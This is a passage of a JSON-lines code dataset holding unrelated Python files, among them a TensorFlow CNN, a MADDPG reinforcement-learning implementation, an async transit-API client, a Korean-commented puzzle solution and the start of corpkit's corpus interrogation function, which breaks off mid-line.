encoded\n\t\t\t\t\ttensorflow vector\n\treturns the accuracy 0 <= accuracy <= 1\n\t\"\"\"\n\tdef get_accuracy(self, x_test, y_test):\n\t\treturn self.accuracy.eval(session=self.sess, feed_dict={self.X: x_test, self.Y: y_test})\n\t\n\n\tdef get_precision(self, x_test, y_test):\n\t\tpredicted = self.sess.run(tf.argmax(self.probabilities, 1), feed_dict={self.X: x_test})\n\t\ttrue = self.sess.run(tf.argmax(y_test, 1))\n\t\ttp = tf.count_nonzero(predicted * true)\n\t\tfp = tf.count_nonzero(predicted * (true - 1))\n\t\t#precision = tp / (tp + fp)\n\t\tprecision = tf.divide(tp, tp + fp)\n\t\treturn self.sess.run(precision, feed_dict={self.X: x_test, self.Y:y_test}) \n","sub_path":"cnn_model.py","file_name":"cnn_model.py","file_ext":"py","file_size_in_byte":5478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"372554958","text":"from user import User\nfrom friends import Friends\nimport matplotlib.pyplot as plt\nimport random\n\nAge = []\nVal = []\ndef gen_random(begin, end, num_count):\n for i in range(num_count):\n Age.append(random.randint(begin, end))\n Val.append(random.randint(begin, end))\n\n\n\ndef draw_graph(ages):\n graph = {}\n for age in ages:\n graph[age] = graph.get(age, 0) + 1\n\n graph = sorted(graph.items())\n for age, val in graph:\n Age.append(age)\n Val.append(val)\n print(age, '#' * val)\n\n\n\n\n\ndef main():\n username = input()\n\n try:\n uid = User(username).execute()\n except User.UserNotFound as e:\n e.msg()\n return\n\n\n try:\n ages = Friends(uid).execute()\n except Friends.FriendsNotFound as e:\n e.msg()\n return\n\n draw_graph(ages)\n #gen_random(1, 50, 50)\n #gen_random(1, 60, 70)\n fig, ax = plt.subplots()\n # add a 'best fit' line\n\n plt.bar(Age, Val, align='center')\n ax.set_xlabel('Age')\n ax.set_ylabel('value')\n ax.set_title('Histogram of ages of friends')\n plt.show()\n\n\n return\n\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"162497193","text":"import numpy as np\r\nimport scipy.integrate as sp\r\nimport matplotlib.pyplot as plt\r\n\r\ndef function(x):\r\n\tr=np.linspace(0,x,num=x,endpoint=True)/1000 #creates x-1 intervals from o to x and calculates dm at that r\r\n\ty=40*np.pi*r**2 #ro = 10 \r\n\tm=np.trapz(y,r)\r\n\treturn m\r\n\r\nr_val=np.arange(10000)\r\nm_val=np.empty(10000)\r\n\r\n\r\nfor r in r_val:\r\n\tm_val[r]=function(r)\r\n\r\n\r\nplt.plot(r_val/1000,m_val,c='r',label='Mass -> Distance')\r\nplt.xlabel('Distance (meter)')\r\nplt.ylabel('Mass in kg')\r\nplt.title('Distance(m) vs Mass(kg).')\r\nplt.legend()\r\nplt.show()\r\n","sub_path":"Question1.py","file_name":"Question1.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"411290201","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/f1nal/Dropbox/python/jet-bridge/src/packages/jet_bridge_base/jet_bridge_base/logger.py\n# Compiled at: 2019-10-30 05:24:12\n# Size of source mod 2**32: 648 bytes\nimport logging\nfrom jet_bridge_base import settings\nlogger = logging.getLogger('jet_bridge')\nlevel = logging.DEBUG if settings.DEBUG else logging.INFO\nch = logging.StreamHandler()\n\nclass Formatter(logging.Formatter):\n formats = {logging.INFO: '%(message)s'}\n default_format = '%(levelname)s - %(asctime)s: %(message)s'\n\n def formatMessage(self, record):\n return self.formats.get(record.levelno, self.default_format) % record.__dict__\n\n\nformatter = Formatter('%(asctime)s %(levelname)s %(message)s', '%Y-%m-%d %H:%M:%S')\nch.setFormatter(formatter)\nch.setLevel(level)\nlogger.setLevel(level)\nlogger.addHandler(ch)","sub_path":"pycfiles/jet_bridge_base-0.7.6-py3-none-any/logger.cpython-35.py","file_name":"logger.cpython-35.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"501555137","text":"\"\"\"\n상근이는 어렸을 적에 \"봄보니 (Bomboni)\" 게임을 즐겨했다.\n가장 처음에 N×N크기에 사탕을 채워 놓는다. 사탕의 색은 모두 같지 않을 수도 있다.\n상근이는 사탕의 색이 다른 인접한 두 칸을 고른다. 그 다음 고른 칸에 들어있는 사탕을 서로 교환한다.\n이제, 모두 같은 색으로 이루어져 있는 가장 긴 연속 부분(행 또는 열)을 고른 다음 그 사탕을 모두 먹는다.\n사탕이 채워진 상태가 주어졌을 때, 상근이가 먹을 수 있는 사탕의 최대 개수를 구하는 프로그램을 작성하시오.\n\n입력\n첫째 줄에 보드의 크기 N이 주어진다. (3 ≤ N ≤ 50)\n다음 N개 줄에는 보드에 채워져 있는 사탕의 색상이 주어진다. 빨간색은 C, 파란색은 P, 초록색은 Z, 노란색은 Y로 주어진다.\n사탕의 색이 다른 인접한 두 칸이 존재하는 입력만 주어진다.\n\n출력\n첫째 줄에 상근이가 먹을 수 있는 사탕의 최대 개수를 출력한다.\n\n3\nCCP\nCCP\nPPC\n\n3\n\n\n\n\"\"\"\n\nimport sys\n\ninput = lambda: sys.stdin.readline().rstrip()\n\n\ndef check(a):\n n = len(a)\n ans = 1\n for i in range(n):\n cnt = 1\n for j in range(1, n): # 1부터 시작함.\n # 행 확인\n if a[i][j] == a[i][j-1]:\n cnt += 1 # 같은색이라면 먹을 수 있는 갯수 증가\n else:\n cnt = 1 # 다른 색이므로 다시 1로 초기화\n if ans < cnt:\n ans = cnt\n cnt = 1\n for j in range(1, n):\n # 열 확인\n if a[j][i] == a[j-1][i]: #\n cnt += 1 # 같은색이라면 먹을 수 있는 갯수 증가\n else:\n cnt = 1 # 다른 색이므로 다시 1로 초기화\n if ans < cnt:\n ans = cnt\n return ans\n\n\n\nn = int(input())\na = [list(input()) for _ in range(n)]\n# [['C', 'C', 'P'],\n# ['C', 'C', 'P'],\n# ['P', 'P', 'C']]\nans = 0\n\nfor i in range(n):\n for j in range(n):\n if j + 1 < n: # 오른칸과 바꿀 시 보드를 벗어나지 않은지 확인\n a[i][j], a[i][j + 1] = a[i][j + 1], a[i][j] # 인접한 두 칸 바꾸기 오른쪽\n temp = check(a) # 먹을 수 있는 사탕개수\n if ans < temp: # 최대개수 찾기\n ans = temp\n a[i][j], a[i][j + 1] = a[i][j + 1], a[i][j] # 되돌려 놓기\n\n if i + 1 < n: # 아랫칸과 바꿀 시 보드를 벗어나지 않은지 확인\n a[i][j], a[i+1][j] = a[i+1][j], a[i][j] # 인접한 두 칸 바꾸기 오른쪽\n temp = check(a) # 먹을 수 있는 사탕개수\n if ans < temp: # 최대개수 찾기\n ans = temp\n a[i][j], a[i+1][j] = a[i+1][j], a[i][j] # 되돌려 놓기\n\nprint(ans)","sub_path":"코드플러스/브루트포스/Boj3085_사탕게임.py","file_name":"Boj3085_사탕게임.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"348439707","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport logging\n\nfrom tornado import gen\nfrom tornado import httpclient\n\nfrom sptrans.v0 import Client, Positions, RequestError, AuthenticationError\n\n\nclass AsyncClient(Client):\n\n @property\n def cookies(self):\n return {\"Cookie\": \"apiCredentials={0}\".format(self._cookies.get('apiCredentials'))}\n\n @gen.coroutine\n def _get_content(self, endpoint, **kwargs):\n client = httpclient.AsyncHTTPClient()\n url = self._build_url(endpoint, **kwargs)\n response = yield client.fetch(url, headers=self.cookies)\n logging.info(\"Response code: {0}\".format(response.code))\n if response.code == 401:\n raise AuthenticationError()\n raise gen.Return(response.body.decode('latin1'))\n\n @gen.coroutine\n def _get_json(self, endpoint, **kwargs):\n content = yield gen.Task(self._get_content, endpoint, **kwargs)\n result = json.loads(content)\n if isinstance(result, dict) and tuple(result.keys()) == (u'Message', ):\n raise RequestError(result[u'Message'])\n\n raise gen.Return(result)\n\n @gen.coroutine\n def get_positions(self, code):\n result_dict = yield gen.Task(self._get_json, 'Posicao', codigoLinha=code)\n raise gen.Return(Positions.from_dict(result_dict))\n","sub_path":"lib/async_sptrans.py","file_name":"async_sptrans.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"14431424","text":"import json\nfrom pathlib import Path\n\npath1 = Path(\"Values.json\")\npath2 = Path(\"TestcaseStructure.json\")\npath3 = Path(\"Done.json\")\ndata1 = json.loads(path1.read_text(encoding='utf-8'))\ndata2 = json.loads(path2.read_text(encoding='utf-8'))\nerror={\"error\":{\"message\":'Входные файлы неккоректны'}}\n\ndef programm():\n def poisk(id):\n for df in data2['params']:\n if df['id'] == id:\n print(df['title'])\n return df['title']\n else:\n if 'values' in df:\n for value in df['values']:\n if value['id'] == id:\n print(value['title'])\n return value['title']\n else:\n if 'params' in value:\n for param in value['params']:\n if param['id'] == id:\n print(param['title'])\n return param['title']\n else:\n if 'values' in param:\n for value2 in param['values']:\n if value2['id'] == id:\n print(value2['title'])\n return value2['title']\n\n return \"no title\"\n\n for a in data1['values']:\n for df in data2['params']:\n if df['id']==a['id']:\n df['value']=poisk(a['value'])\n if poisk(a['value'])=='no title':\n df['value']=a['value']\n if 'values' in df:\n for value in df['values']:\n if 'params' in value:\n for param in value['params']:\n if param['id']==a['id']:\n param['value']=poisk(a['value'])\n if poisk(a['value'])=='no title':\n param['value']=a['value']\n path3.write_text(json.dumps(data2, sort_keys=True, indent=3, ensure_ascii=False))\n\nif 'params' not in data2 or 'values' not in data1:\n with open('error.json', 'w') as outfile:\n json.dump(error,outfile, indent=3, ensure_ascii=False)\nelse: programm()","sub_path":"qa-trainee-task-master/my.py","file_name":"my.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"5822979","text":"from model import Critic, Actor, Models\nimport torch as th\nfrom copy import deepcopy\nfrom memory import ReplayMemory, Experience\nfrom torch.optim import Adam\nfrom randomProcess import OrnsteinUhlenbeckProcess\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport numpy as np\nfrom params import scale_reward\n\n\ndef soft_update(target, source, t):\n for target_param, source_param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(\n (1 - t) * target_param.data + t * source_param.data)\n\n\ndef hard_update(target, source):\n for target_param, source_param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(source_param.data)\n\n\nclass MADDPG:\n def __init__(self, n_agents, dim_obs, dim_act, batch_size,\n capacity, episodes_before_train, load_models=None):\n # self.actors = [Actor(dim_obs, dim_act) for i in range(n_agents)]\n # self.critics = [Critic(n_agents, dim_obs, dim_act) for i in range(n_agents)]\n\n if load_models is None:\n self.models = Models(n_agents, dim_obs, dim_act)\n self.actors_target = deepcopy(self.models.actors)\n self.critics_target = deepcopy(self.models.critics)\n self.critic_optimizer = [Adam(x.parameters(), lr=0.0001) for x in self.models.critics] # 0.001\n self.actor_optimizer = [Adam(x.parameters(), lr=0.00001) for x in self.models.actors] # 0.0001\n self.memory = ReplayMemory(capacity)\n self.var = [1.0 for i in range(n_agents)]\n else:\n print('Start loading models!')\n states = th.load(load_models)\n self.models = states['models']\n self.critic_optimizer = states['critic_optimizer']\n self.actor_optimizer = states['actor_optimizer']\n self.critics_target = states['critics_target']\n self.actors_target = states['actors_target']\n self.memory = states['memory']\n self.var = states['var']\n print('Models loaded!')\n\n self.n_agents = n_agents\n self.n_states = dim_obs\n self.n_actions = dim_act\n self.batch_size = batch_size\n self.use_cuda = th.cuda.is_available()\n self.episodes_before_train = episodes_before_train\n\n self.GAMMA = 0.95\n self.tau = 0.01\n\n if self.use_cuda:\n for x in self.models.actors:\n x.cuda()\n for x in self.models.critics:\n x.cuda()\n for x in self.actors_target:\n x.cuda()\n for x in self.critics_target:\n x.cuda()\n\n self.steps_done = 0\n self.episode_done = 0\n\n def update_policy(self):\n # do not train until exploration is enough\n if self.episode_done <= self.episodes_before_train:\n return None, None\n\n ByteTensor = th.cuda.ByteTensor if self.use_cuda else th.ByteTensor\n FloatTensor = th.cuda.FloatTensor if self.use_cuda else th.FloatTensor\n\n c_loss = []\n a_loss = []\n\n critics_grad = []\n actors_grad = []\n for agent in range(self.n_agents):\n transitions = self.memory.sample(self.batch_size)\n batch = Experience(*zip(*transitions))\n non_final_mask = ByteTensor(list(map(lambda s: s is not None,\n batch.next_states)))\n # state_batch: batch_size x n_agents x dim_obs\n state_batch = Variable(th.stack(batch.states).type(FloatTensor))\n action_batch = Variable(th.stack(batch.actions).type(FloatTensor))\n reward_batch = Variable(th.stack(batch.rewards).type(FloatTensor))\n # : (batch_size_non_final) x n_agents x dim_obs\n non_final_next_states = Variable(th.stack(\n [s for s in batch.next_states if s is not None]).type(FloatTensor))\n\n # for current agent\n whole_state = state_batch.view(self.batch_size, -1)\n whole_action = action_batch.view(self.batch_size, -1)\n\n # critic network\n self.critic_optimizer[agent].zero_grad()\n current_Q = self.models.critics[agent](whole_state, whole_action) # forward?\n\n non_final_next_actions = [\n self.actors_target[i](non_final_next_states[:, i, :]) for i in range(self.n_agents)]\n non_final_next_actions = th.stack(non_final_next_actions)\n# non_final_next_actions = Variable(non_final_next_actions)\n non_final_next_actions = (\n non_final_next_actions.transpose(0, 1).contiguous())\n\n target_Q = Variable(th.zeros(self.batch_size).type(FloatTensor))\n target_Q[non_final_mask] = self.critics_target[agent](\n non_final_next_states.view(-1, self.n_agents * self.n_states),\n non_final_next_actions.view(-1, self.n_agents * self.n_actions))\n\n # scale_reward: to scale reward in Q functions\n target_Q = (target_Q * self.GAMMA) + (reward_batch[:, agent] * scale_reward)\n\n loss_Q = nn.MSELoss()(current_Q, target_Q.detach())\n loss_Q.backward()\n\n self.critic_optimizer[agent].step()\n\n # actor network\n self.actor_optimizer[agent].zero_grad()\n state_i = state_batch[:, agent, :]\n action_i = self.models.actors[agent](state_i) # forward\n ac = action_batch.clone()\n ac[:, agent, :] = action_i\n whole_action = ac.view(self.batch_size, -1)\n actor_loss = -self.models.critics[agent](whole_state, whole_action) # forward\n actor_loss = actor_loss.mean()\n actor_loss.backward()\n self.actor_optimizer[agent].step()\n\n c_loss.append(loss_Q)\n a_loss.append(actor_loss)\n\n # for test\n '''\n s = 0\n for x in self.models.critics[agent].parameters():\n s += 1\n print('s: ', s)\n print(type(x))\n print('x.grad.shape: ', x.grad.size())\n print('x.data.shape: ', x.data.size())\n '''\n critics_agent_grad = []\n actors_agent_grad = []\n for x in self.models.critics[agent].parameters():\n critics_agent_grad.append(x.grad.data.norm(2))\n # critics_agent_grad.append(th.mean(x.grad).data[0])\n for x in self.models.actors[agent].parameters():\n actors_agent_grad.append(x.grad.data.norm(2))\n # actors_agent_grad.append(th.mean(x.grad).data[0])\n\n critics_grad.append(critics_agent_grad)\n actors_grad.append(actors_agent_grad)\n\n\n if self.steps_done % 100 == 0 and self.steps_done > 0:\n for i in range(self.n_agents):\n soft_update(self.critics_target[i], self.models.critics[i], self.tau)\n soft_update(self.actors_target[i], self.models.actors[i], self.tau)\n\n '''\n # gradient clipping\n if self.clip is not None:\n nn.utils.clip_grad_norm(self.model.parameters(), self.clip)\n '''\n\n # return c_loss, a_loss #, critics_grad, actors_grad\n return critics_grad, actors_grad\n\n def select_action(self, state_batch):\n # state_batch: n_agents x state_dim\n actions = Variable(th.zeros(\n self.n_agents,\n self.n_actions))\n FloatTensor = th.cuda.FloatTensor if self.use_cuda else th.FloatTensor\n for i in range(self.n_agents):\n sb = state_batch[i, :].detach()\n act = self.models.actors[i](sb.unsqueeze(0)).squeeze()\n\n act += Variable(th.from_numpy(np.random.randn(2) * self.var[i]).type(FloatTensor))\n\n if self.episode_done > self.episodes_before_train and self.var[i] > 0.05: # and self.episode_done % 100 == 0\n self.var[i] *= 0.999998\n\n act = th.clamp(act, -1.0, 1.0)\n\n actions[i, :] = act\n self.steps_done += 1\n # print('steps_done: ', self.steps_done)\n # print('episode_done: ', self.episode_done)\n\n return actions\n","sub_path":"madrl_environments/MADDPG.py","file_name":"MADDPG.py","file_ext":"py","file_size_in_byte":8196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300765091","text":"\"\"\"\ncorpkit: Interrogate a parsed corpus\n\"\"\"\n\n#!/usr/bin/python\n\nfrom __future__ import print_function\nfrom corpkit.constants import STRINGTYPE, PYTHON_VERSION, INPUTFUNC\n\ndef interrogator(corpus, \n search, \n query='any',\n show='w',\n exclude=False,\n excludemode='any',\n searchmode='all',\n dep_type='collapsed-ccprocessed-dependencies',\n case_sensitive=False,\n save=False,\n just_speakers=False,\n preserve_case=False,\n lemmatag=False,\n files_as_subcorpora=False,\n only_unique=False,\n random=False,\n only_format_match=False,\n multiprocess=False,\n spelling=False,\n regex_nonword_filter=r'[A-Za-z0-9:_]',\n gramsize=2,\n split_contractions=False,\n conc=False,\n maxconc=9999,\n window=4,\n no_closed=False,\n no_punct=True,\n whitelist=False,\n **kwargs\n ):\n \"\"\"\n Interrogate corpus, corpora, subcorpus and file objects.\n See corpkit.interrogation.interrogate() for docstring\n \"\"\"\n\n # in case old kwarg is used\n conc = kwargs.get('do_concordancing', conc)\n\n # store kwargs and locs\n locs = locals().copy()\n locs.update(kwargs)\n locs.pop('kwargs', None)\n\n if isinstance(search, STRINGTYPE) and len(search) > 3:\n raise ValueError('search argument not recognised.')\n\n import codecs\n import signal\n import os\n from time import localtime, strftime\n from collections import Counter\n\n import corenlp_xml\n import pandas as pd\n from pandas import DataFrame, Series\n\n from corpkit.interrogation import Interrogation, Interrodict\n from corpkit.corpus import Datalist, Corpora, Corpus, File, Subcorpus\n from corpkit.process import (tregex_engine, get_deps, unsplitter, sanitise_dict, \n get_speakername, animator, filtermaker)\n from corpkit.other import as_regex\n from corpkit.dictionaries.word_transforms import wordlist, taglemma\n from corpkit.dictionaries.process_types import Wordlist\n from corpkit.build import check_jdk\n\n import re\n if regex_nonword_filter:\n is_a_word = re.compile(regex_nonword_filter)\n else:\n is_a_word = re.compile(r'.*')\n \n have_java = check_jdk()\n\n def signal_handler(signal, _):\n \"\"\"pause on ctrl+c, rather than just stop loop\"\"\" \n import signal\n import sys\n from time import localtime, strftime\n signal.signal(signal.SIGINT, original_sigint)\n thetime = strftime(\"%H:%M:%S\", localtime())\n INPUTFUNC('\\n\\n%s: Paused. Press any key to resume, or ctrl+c to quit.\\n' % thetime)\n time = strftime(\"%H:%M:%S\", localtime())\n print('%s: Interrogation resumed.\\n' % time)\n signal.signal(signal.SIGINT, signal_handler)\n\n def fix_show(show):\n \"\"\"lowercase anything in show and turn into list\"\"\"\n if isinstance(show, list):\n show = [i.lower() for i in show]\n elif isinstance(show, STRINGTYPE):\n show = show.lower()\n show = [show]\n\n # this little 'n' business is a hack: when ngramming,\n # n shows have their n stripped, so nw should be nw \n # so we know we're ngramming and so it's not empty.\n for index, val in enumerate(show):\n if val == 'n' or val == 'nw':\n show[index] = 'nw'\n elif val == 'b' or val == 'bw':\n show[index] = 'bw'\n elif val.endswith('pl'):\n show[index] = val.replace('pl', 'x')\n else:\n if len(val) == 2 and val.endswith('w'):\n show[index] = val[0]\n return show\n\n def fix_search(search):\n \"\"\"if search has nested dicts, remove them\"\"\"\n ends = ['w', 'l', 'i', 'n', 'f', 'p', 'x', 's']\n if not search:\n return\n if isinstance(search, STRINGTYPE):\n return search\n if search.get('t'):\n return search\n newsearch = {}\n for srch, pat in search.items():\n if len(srch) == 1 and srch in ends:\n srch = 'm%s' % srch\n if isinstance(pat, dict):\n for k, v in list(pat.items()):\n if k != 'w':\n newsearch[srch + k] = pat_format(v)\n else:\n newsearch[srch] = pat_format(v)\n else:\n newsearch[srch] = pat_format(pat)\n return newsearch\n\n def pat_format(pat):\n from corpkit.dictionaries.process_types import Wordlist\n import re\n if pat == 'any':\n return re.compile(r'.*')\n if isinstance(pat, Wordlist):\n pat = list(pat)\n if isinstance(pat, list):\n if all(isinstance(x, int) for x in pat):\n pat = [str(x) for x in pat]\n pat = filtermaker(pat, case_sensitive=case_sensitive, root=kwargs.get('root'))\n else:\n if isinstance(pat, int):\n return pat\n if isinstance(pat, re._pattern_type):\n return pat\n if case_sensitive:\n pat = re.compile(pat)\n else:\n pat = re.compile(pat, re.IGNORECASE)\n return pat\n\n def is_multiquery(corpus, search, query, just_speakers):\n \"\"\"determine if multiprocessing is needed\n do some retyping if need be as well\"\"\"\n is_mul = False\n from collections import OrderedDict\n #if hasattr(corpus, '__iter__'):\n # is_mul = True\n # so we can do search = 't', query = ['NP', 'VP']:\n from corpkit.dictionaries.process_types import Wordlist\n if isinstance(query, Wordlist):\n query = list(query)\n if isinstance(query, list):\n if query != list(search.values())[0] or len(list(search.keys())) > 1:\n query = {c.title(): c for c in query}\n if isinstance(query, (dict, OrderedDict)):\n is_mul = True\n if just_speakers:\n if just_speakers == 'each':\n is_mul = True\n just_speakers = ['each']\n if just_speakers == ['each']:\n is_mul = True\n elif isinstance(just_speakers, STRINGTYPE):\n is_mul = False\n just_speakers = [just_speakers]\n #import re\n #if isinstance(just_speakers, re._pattern_type):\n # is_mul = False\n if isinstance(just_speakers, list):\n if len(just_speakers) > 1:\n is_mul = True\n if isinstance(search, dict):\n if all(isinstance(i, dict) for i in list(search.values())):\n is_mul = True\n return is_mul, corpus, search, query, just_speakers\n\n def slow_tregex(sents, **dummy_args):\n \"\"\"do the speaker-specific version of tregex queries\"\"\"\n speakr = dummy_args.get('speaker', '')\n import os\n from corpkit.process import tregex_engine\n # first, put the relevant trees into temp file\n to_open = '\\n'.join(sent.parse_string.strip() for sent in sents \\\n if sent.parse_string is not None)\n q = list(search.values())[0]\n ops = ['-o', '-%s' % translated_option]\n concs = []\n res = tregex_engine(query=q, \n options=ops, \n corpus=to_open,\n root=root,\n preserve_case=True\n )\n if not no_conc:\n ops += ['-w', '-f']\n whole_res = tregex_engine(query=q, \n options=ops, \n corpus=to_open,\n root=root,\n preserve_case=True\n )\n for line in whole_res:\n line.insert(1, speakr) \n\n res = format_tregex(res)\n whole_res = format_tregex(whole_res, whole=True)\n concs = make_conc_lines_from_whole_mid(whole_res, res)\n\n if root:\n root.update()\n if countmode:\n if isinstance(res, int):\n return res, False\n else:\n return len(res), False\n else:\n return res, concs\n\n def get_stats(sents, **dummy_args):\n \"\"\"get a bunch of frequencies on interpersonal phenomena\"\"\"\n from collections import Counter\n statsmode_results = Counter() \n # first, put the relevant trees into temp file\n\n for sent in sents:\n statsmode_results['Sentences'] += 1\n deps = get_deps(sent, dep_type)\n numpass = len([x for x in deps.links if x.type.endswith('pass')])\n statsmode_results['Passives'] += numpass\n statsmode_results['Tokens'] += len(sent.tokens)\n words = [w.word for w in sent.tokens if w.word is not None and w.word.isalnum()]\n statsmode_results['Words'] += len(words)\n statsmode_results['Characters'] += len(''.join(words))\n\n to_open = '\\n'.join(s.parse_string.strip() for s in sents)\n\n from corpkit.dictionaries.process_types import processes\n from corpkit.other import as_regex\n tregex_qs = {'Imperative': r'ROOT < (/(S|SBAR)/ < (VP !< VBD !< VBG !$ NP !$ SBAR < NP !$-- S !$-- VP !$ VP)) !<< (/\\?/ !< __) !<<- /-R.B-/ !<<, /(?i)^(-l.b-|hi|hey|hello|oh|wow|thank|thankyou|thanks|welcome)$/',\n 'Open interrogative': r'ROOT < SBARQ <<- (/\\?/ !< __)', \n 'Closed interrogative': r'ROOT ( < (SQ < (NP $+ VP)) << (/\\?/ !< __) | < (/(S|SBAR)/ < (VP $+ NP)) <<- (/\\?/ !< __))',\n 'Unmodalised declarative': r'ROOT < (S < (/(NP|SBAR|VP)/ $+ (VP !< MD)))',\n 'Modalised declarative': r'ROOT < (S < (/(NP|SBAR|VP)/ $+ (VP < MD)))',\n 'Open class': r'/^(NN|JJ|VB|RB)/ < __',\n 'Closed class': r'__ !< __ !> /^(NN|JJ|VB|RB)/',\n 'Clauses': r'/^S/ < __',\n 'Interrogative': r'ROOT << (/\\?/ !< __)',\n 'Mental processes': r'VP > /^(S|ROOT)/ <+(VP) (VP <<# /%s/)' % \\\n as_regex(processes.mental, boundaries='w'),\n 'Verbal processes': r'VP > /^(S|ROOT)/ <+(VP) (VP <<# /%s/)' % \\\n as_regex(processes.verbal, boundaries='w'),\n 'Relational processes': r'VP > /^(S|ROOT)/ <+(VP) (VP <<# /%s/)' % \\\n as_regex(processes.relational, boundaries='w'),\n 'Verbless clause': r'/^S/ !<< /^VB.?/'}\n\n for name, q in sorted(tregex_qs.items()):\n res = tregex_engine(query=q, \n options=['-o', '-C'], \n corpus=to_open, \n root=root\n )\n statsmode_results[name] += int(res)\n if root:\n root.update()\n return statsmode_results, []\n\n def make_conc_lines_from_whole_mid(wholes,\n middle_column_result\n ):\n \"\"\"\n Create concordance line output from tregex output\n \"\"\"\n import re\n import os\n if not wholes and not middle_column_result:\n return []\n\n conc_lines = []\n # remove duplicates from results\n unique_wholes = []\n unique_middle_column_result = []\n duplicates = []\n for (f, sk, whole), mid in zip(wholes, middle_column_result):\n joined = '-join-'.join([f, sk, whole, mid])\n if joined not in duplicates:\n duplicates.append(joined)\n unique_wholes.append([f, sk, whole])\n unique_middle_column_result.append(mid)\n\n # split into start, middle and end, dealing with multiple occurrences\n for (f, sk, whole), mid in zip(unique_wholes, unique_middle_column_result):\n reg = re.compile(r'([^a-zA-Z0-9-]|^)(' + re.escape(mid) + r')([^a-zA-Z0-9-]|$)', \\\n re.IGNORECASE | re.UNICODE)\n offsets = [(m.start(), m.end()) for m in re.finditer(reg, whole)]\n for offstart, offend in offsets:\n start, middle, end = whole[0:offstart].strip(), whole[offstart:offend].strip(), \\\n whole[offend:].strip()\n conc_lines.append([os.path.basename(f), sk, start, middle, end])\n return conc_lines\n\n def uniquify(conc_lines):\n \"\"\"get unique concordance lines\"\"\"\n from collections import OrderedDict\n unique_lines = []\n checking = []\n for index, (_, speakr, start, middle, end) in enumerate(conc_lines):\n joined = ' '.join([speakr, start, 'MIDDLEHERE:', middle, ':MIDDLEHERE', end])\n if joined not in checking:\n unique_lines.append(conc_lines[index])\n checking.append(joined)\n return unique_lines\n\n def lemmatiser(list_of_words, tag):\n \"\"\"\n Take a list of unicode words and a tag and return a lemmatised list\n \"\"\"\n output = []\n for word in list_of_words:\n if translated_option.startswith('u'):\n word = taglemma.get(word.lower(), 'Other')\n else:\n word = wordlist.get(word, lmtzr.lemmatize(word, tag))\n if not preserve_case:\n word = word.lower()\n output.append(word)\n return output\n\n def tgrep_searcher(sents, search, show, conc, **kwargs):\n \"\"\"\n Use tgrep for constituency grammar search\n \"\"\"\n f = kwargs.get('filename')\n from corpkit.process import show_tree_as_per_option, tgrep\n out = []\n conc_output = []\n conc_out = []\n for sent in sents:\n sk = get_speakername(sent)\n results = tgrep(sent, search['t'])\n for res in results:\n out.append(show_tree_as_per_option(show, res, sent))\n if conc:\n lin = [f, sk, show_tree_as_per_option(show + ['whole'], res, sent)]\n conc_out.append(lin)\n\n if conc:\n conc_output = make_conc_lines_from_whole_mid(conc_out, out)\n return out, conc_output\n\n def gettag(query, lemmatag=False):\n \"\"\"\n Find tag for WordNet lemmatisation\n \"\"\"\n if lemmatag:\n return lemmatag\n\n tagdict = {'N': 'n',\n 'J': 'a',\n 'V': 'v',\n 'A': 'r',\n 'None': False,\n '': False,\n 'Off': False}\n\n # in case someone compiles the tregex query\n try:\n query = query.pattern\n except AttributeError:\n query = query\n \n\n qr = query.replace(r'\\w', '').replace(r'\\s', '').replace(r'\\b', '')\n firstletter = next((c for c in qr if c.isalpha()), 'n')\n return tagdict.get(firstletter.upper(), 'n')\n\n def format_tregex(results, whole=False):\n \"\"\"format tregex by show list\"\"\"\n import re\n\n if countmode:\n return results\n\n if not results:\n return\n\n done = []\n if whole:\n fnames, snames, results = zip(*results)\n\n if 'l' in show or 'x' in show:\n lemmata = lemmatiser(results, gettag(search.get('t'), lemmatag))\n else:\n lemmata = [None for i in results]\n for word, lemma in zip(results, lemmata):\n bits = []\n if exclude and exclude.get('w'):\n if len(list(exclude.keys())) == 1 or excludemode == 'any':\n if re.search(exclude.get('w'), word):\n continue\n if len(list(exclude.keys())) == 1 or excludemode == 'any':\n if re.search(exclude.get('l'), lemma):\n continue\n if len(list(exclude.keys())) == 1 or excludemode == 'any':\n if re.search(exclude.get('p'), word):\n continue\n if len(list(exclude.keys())) == 1 or excludemode == 'any':\n if re.search(exclude.get('x'), lemma):\n continue\n if exclude and excludemode == 'all':\n num_to_cause_exclude = len(list(exclude.keys()))\n current_num = 0\n if exclude.get('w'):\n if re.search(exclude.get('w'), word):\n current_num += 1\n if exclude.get('l'):\n if re.search(exclude.get('l'), lemma):\n current_num += 1\n if exclude.get('p'):\n if re.search(exclude.get('p'), word):\n current_num += 1\n if exclude.get('x'):\n if re.search(exclude.get('x'), lemma):\n current_num += 1 \n if current_num == num_to_cause_exclude:\n continue \n\n for i in show:\n if i == 't':\n bits.append(word)\n if i == 'l':\n bits.append(lemma)\n elif i == 'w':\n bits.append(word)\n elif i == 'p':\n bits.append(word)\n elif i == 'x':\n bits.append(lemma)\n joined = '/'.join(bits)\n done.append(joined)\n if whole:\n done = zip(fnames, snames, done)\n return done\n\n def tok_by_list(pattern, list_of_toks, concordancing=False, **kwargs):\n \"\"\"search for regex in plaintext corpora\"\"\"\n import re\n if 